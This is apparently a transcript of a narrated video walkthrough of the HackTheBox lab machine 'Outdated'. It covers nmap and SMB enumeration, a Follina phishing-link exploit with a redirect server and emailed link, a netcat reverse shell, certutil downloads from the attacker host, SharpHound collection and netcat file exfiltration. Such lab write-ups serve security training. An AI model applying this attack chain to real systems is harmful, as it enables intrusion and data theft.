Well, hello everyone, welcome back guys, hope you are doing well. So today we are going to solve a machine from Hackthebox. The machine name is outdated and the difficulty level of that machine is medium. So without wasting time, let's go and start it with the nmap. So nmap space -s capital V space -s capital C for the default scripts, and the target IP is 10.10.11.175, and I'm going to save the scan results in a file named as default.nmap. Okay. I already ran the scan to save the time, so just I'm going to show you the scan results, and here they are. So bunch of ports open. The first one is port number 25, which is TCP port, and the port state is open, and this is default for SMTP, and it's using HMail server. The best information here is we found a valid subdomain, which is mail.outdated.htb, and the commands here are these are the commands, and among all these commands, few commands are very important as a penetration tester or a hacker, because this verify command and rcpt command, these two commands are used for the username enumeration. Fine. So the next port is port number 53, which is for DNS, and it's using simple DNS plus. Another port is port number 8080, which is Kerberos sec port, and this is indicating that maybe the target server is going to be the domain controller or Active Directory. Port number 135, RPC is open, NetBIOS is open, LDAP. And LDAP, if you go to see the SSL certificate information, here you find that dc.outdated.htb. So DC is the host name for the domain controller, and the fully qualified domain name is this. Okay. SMB shares are there. K password 5 is there. Okay, fine. And in the last, this information is also indicating that maybe the target is going to be the Windows server, because SMB signing is enabled and required by default in the Windows servers. So maybe, let's see. I'm going to start it with SMB shares. So I'm going to say SMB client, list the shares with target IP, which is this. Hit enter. It's asking for the password, and yeah, there are a bunch of shares. So these are the default. There is one netlogon share. Sysvol is also interesting. There is a share named as update service packages. So, and versus content. So maybe the server is configured for the Windows update services, but we will see that in a minute. So I'm going to start it with share. Clear that shares, and here I'm going to delete that. Hit enter, enter, and we are in listing the files and directories, and there is one file, knock reminder.pdf. Just going to get that file, paste that, hit enter, and we have this file. So come back here, and this is the file. Let's see what's in it. Okay, so attention IT stuff, and due to the last week's security breach, we need to rebuild some of our core server. This has impacted a handful of our workstation, update services, monitoring tool, and backups. As we work to rebuild, please assist our NOC team by emailing a link to any internal web application to IT support, and this is interesting. That means we can send them any link, and they are going to react on that. So we can get them added back into our monitoring platform for alert and notifications. Fine. And they also onboarded one employee in the SOC team to assist with this matter. And they have a list of CVEs, list of vulnerabilities, which they are going to check. If these vulnerabilities exist, they are going to patch it. So these are the top priority security vulnerabilities they are going to look for. Okay, so the first one is CVE 2022-3190, and that seems Microsoft support diagnostic tool vulnerability, which recently in the 2022, its name is Folina. So I'm going to copy this and I think this is the Follina. So come back here, paste that, GitHub, and yeah, Follina. Fine. So if this is Follina, I'm going to try with the John Hammond exploit, which I already get that here. Okay, go to his repositories and scroll down a little bit, and here we go. This is MSDT Follina. Fine. So from here you can clone this repository. I already cloned it to save the time, and this is the repository. Fine. So now first of all I'm going to look into this follina.py file, and here there are a bunch of switches. The first one is command. So by default it's using calc command to open the calculator. If you want to use another command, you can also use it. Another is, once you execute this exploit, it is going to create a file named as follina.doc. But if you want to change the name of this file, you can also use space -o switch. And for the interface, you can choose space -i or -- interface. By default, it is using interface ETH0. So in our case, we are going to choose tunnel 0 interface, and you can see what's yours. Okay. For the port, once you execute this exploit, it is going to start a HTTP server, which is going to be published by default on port number 8000, but you can change the port number with -c -p switch. And simultaneously you can also get the reverse shell. So for reverse shell, you have to specify the port on which you want to listen for the reverse shell, and with space -r switch you can do that. Okay, then here directories, and this is the important part. It is going to get external referer, and whatever interface you are going to choose, it is going to take the IP of that interface, and whatever port on which you want to publish your HTTP server, it is going to take that port, and it is going to call index.html from that. And this is again the most important part here. Here it's executing command, and executing actually it's invoking the web request to download the netcat binary, right? But it's downloading the netcat binary from his repository. We already clone his repository, so we don't need to go outside. We can simply do this from our machine. So let's see what's my IP here. ifconfig tunnel 0, and my IP is 10.10.14.7, so 10.10.14.7. We don't need raw is equal to true, and it is going to download that file and then save it to this path, and then it is going to execute that binary for the reverse shell using your interface IP and the port you specify with -- reverse switch. Okay, so that's it. I think I'm going to save this file. So what I did is I sent the mail to the NOC team, and whenever they click on it, it is going to come to my redirect server, and my redirect server again redirected to the follina.py HTTP server. So for this, I'm going to create two more files. The first one is going to be the index.html, and another one is Python redirect server. So HTML body /body and /HTML, and here I'm going to put an anchor. So a href is equal to http://10.10.14.7, and let's say follina.doc. Right now this file does not exist. It will be created once we execute follina.py. Okay, and here I'm going to say your file is here, and close that tag, save it, and save it as save it inside this Follina directory as index.html. Fine. Okay. Second thing, we need to create one server, redirect server. Okay. So come here, Python 3 HTTP server redirect. Come here, the first link, and go down, scroll down. I think this one is okay, so I'm going to copy that and come here, open one new tab, paste that, and we need to change a little bit. So the first thing is we are going to execute it with Python 3, so we need to change it from simple HTTP server to http.server. Second thing, this socket server module is as it is for Python 2 and Python 3, just the difference is this uppercase or lowercase, so it is completely in lowercase. Here again we must put http.server and then create a method print. Also print should be in the brackets, and after that I'm going to put here a condition. The condition is if self.path is equal to /hack, then what it's going to do, okay, I don't need that, so I'm going to hard code it with http://101014.7 on port number, let's say 9090 /index.html, right? So if whenever they are going to click on our email link, okay, what we send them in the email, so it is going to see, okay, if the endpoint is /hack, so I need to redirect the request, and redirect where? Redirect to this address, and this server is going to be published with the follina.py on port number 9090, right? Okay, and here we are going to return this, copy and paste that, .do_get self, fine, and the port number here for this server I'm going to use port number 80, and handler is equal to, okay, rest of the things are okay. So I'm going to save that, or we can do one more thing. Let's say my class is equal to my handler, because my handler is the class, so I'm calling this my handler into a variable, and here I'm going to put the variable which is my class. Okay, and rest of the things are fine. So save it as inside msdt Follina. I'm going to save it as redirect.py. Fine. So hopefully that will be okay. We will not get any error. So I'm going to exit from SMB share, clear that, clear. Now we need to send the email. So to send the email, I use swax. You can use sendmail also. Swax --2. So it is going to be on this email. Copy, come back here, paste that, --from, let's say hell at well done, and we need to specify the server for SMTP to send the email. So mail.outdated.htb, and then the message we need to put inside the body, which is going to be http:// our server redirect server with the /hack. So once we send this email, it has the endpoint /hack. So once the server redirect server will see, okay, it has the endpoint /hack, so it is going to redirect it to this. Seems everything okay. I'm going to copy that. Now come back on the terminal. First of all, cd msdt Follina, go to that directory. Okay, now here I'm going to start the Python server, redirect server. So python 3 redirect.py. Okay, we skip something which is here. It should be for Python 3, it should be in the lowercase. Okay, now it's started, and here I'm going to start the Follina. So python 3 follina.py -- interface is going to be tunnel 0 and -- port. The port we specified inside the redirect where it's going to redirect is 9090, and reverse, I'm going to take the reverse shell on port 4545. Fine. And now start it, and now I'm going to send the email. So this is the syntax and command we write. Okay, everything is fine. Hope for the best. Hit enter, finger cross. Email has been sent. We need to wait a moment. And we get hit here, and anytime we may get reverse shell here. So once it's see /hack, it's redirected our request. So we are halfway. The first thing is working, which is we are successfully getting the hit from the server, from the target, and it's redirected, but here we did not get the reverse shell. Let's change the port, maybe that works. Close this, clear that, and let's say 5555 and send the email again. This time we did not get any hit. Okay, what I'm going to do, I'm going to reset the machine and come back. I'm going to pause the video, reset machine and come back. Fine. Let's see. I already get reverse shell once when I was going to reset the machine, but as I pause the video, I get the reverse shell. As you can see, it get the netcat. It's downloaded the netcat, and we get the reverse shell. So maybe we need to wait more. Let's see. Okay, we get hit here, and the netcat is downloaded, and we get the reverse shell, the pretty reverse shell, because this machine has a lot of problems. Maybe 50 times I tried, then I get the reverse shell. So we got the initial foothold here, and we will start the enumeration. So let's see, first of all, who am I space /all. Okay, so the username is btables, and this is the domain user, because you can see the name is specified with the domain name. This is the SID. Okay, all these are the group names. There is IT staff. everyone, authenticated user, NT authority. Okay, so this user is also a member of IT staff. The privileges are not very interesting. Only one is enabled, which is change notification, notify privilege. Okay, let's go and we will start enumerating it with the bloodhound. Why not? Clear will not work. So what I'm going to do here is I already have here the sharphound.ps1 which I downloaded. You can easily find it here on GitHub. Sharphound.ps1 GitHub, just write like this, and the very first tab here, very first link, you can download it from here, or you can go to view raw, and once you see the code, you just copy and paste in a file and named it as sharphound.ps1 or whatever. So I'm going to go back a directory, because here we have sharphound, and I'm going to start a Python server on python 3 space -m http.server and publish it on port 8080. Come back here, let's go to PowerShell space -ep, which is execution policy bypass. Hit enter. Okay, now we are here. Fine. Okay, so let's use certutil. Certutil.exe space -url cache space -f space -split, and let's say http:// this is my IP on port 8080 / sharphound.ps1. It's downloaded, it's running pretty fast. So ls, and we have sharphound. Okay, so now we need to import the module. So dot space dot / and sharphound.ps1. In that way you can import this. So it's imported successfully. Now we need to execute the command to collect all the files and then zip it in a file. So the command is going to be invoke bloodhound space collection method, and collection method is going to be all, so it is going to collect everything, and then space -domain space domain name, which is outdated.htb, and then we need to specify the file. So zip file name, and I'm going to name it as outdated.zip. Fine, hit enter, and here it is going to take a bit time. So I'm going to pause the video. Once it's finished and the file is generated, we'll be back. And we successfully created the zip file. So if I do ls outdated, where it goes, outdated.zip, this one. Fine, so now we need to bring this file to our local machine, and for this I'm going to use netcat. So first of all, okay, I put here this netcat, copy that and put it here. certutil.exe url cache space -f space -split and http:// attack box on port number 8080/nc64.exe. Close the quotes. Okay, we successfully get it, ls and nc64.exe. Now I'm going to close the HTTP server here, and here I'm going to listen nc space hyphen nlvp on port, let's say 7575, and I'm going to grab this file. So copy that and paste it here. Fine, and start listening. Then here what we need to do is nc64.exe space hyphen v space hyphen e, not e, just mention the host where you are going to transfer and the port, which is 7575, and the same file, paste it. Okay, we are listening here, just hit enter. Okay, there is something. Okay, so this sign is not allowed and it is for future use. So I'm going to exit from the PowerShell. Now we are in the CMD. So again, copy this command and paste it here. Hit enter. 7575, and this is the file name. Okay, we get the connection. So just going to wait a moment. Make sure we get this file here. This is the file. Okay, I think the transfer is completed. Now don't make Control C here. Control C should be here. If you make Control C here, you lost your shell. So if you Control C on this listener terminal, it is going to close the listener and this connection will be closed and you get the shell as it is, like this. Fine. Although, let's see, I'm going to start the Neo4j console. Okay, to start the Neo4j service, and here I'm going to start Bloodhound space hyphen hyphen no hyphen sandbox. And I don't need now this, don't need that, don't need that. Okay, so Bloodhound is started and this is also starting. Let's wait a moment. Okay, it's started and we need to access this on the browser, but it's already started, so it should be green. Okay, green means the server is started. Neo4j, just log in the Bloodhound. Fine. Now click here. As you can see, there is no session, there is no information. It's already clear. There is nothing in the database. So now we need to import that zip file here. So once you hover cursor, you can see here upload data. Just click on it and go to the right directory, which is Hackthebox outdated, and this is the zip file which we need to import here. And as you can see, there are computers.json. So all the computers in the domain, it has information of it, what kind of ACLs are there, everything is here. Containers, group, GPOs, group policy objects, OUs, everything. Invalid file type, why so? Let's see. GPUs. Let's extract that here. Come here. Yeah, information is there. Fine. Computers. Why it's not uploading? Okay, wait a moment. Warm up database. Do it. Clear database. Okay. And refresh database status. Okay, upload the data one more time. Refresh. Okay, we can do one more way. Why it's not uploading? Okay, let's try to open Net4j, but it's already started, so we don't need to. Okay, try to upload all these files. This is a problem in my Bloodhound because the data is already there in the files. So I'm going to stop the video here. I'm going to pack up this video here and I'm going to resolve the issue in my Bloodhound. And in the next video, we are going to see the Bloodhound enumeration. Fine. So see you in the next video, guys. Thank you so much. Bye.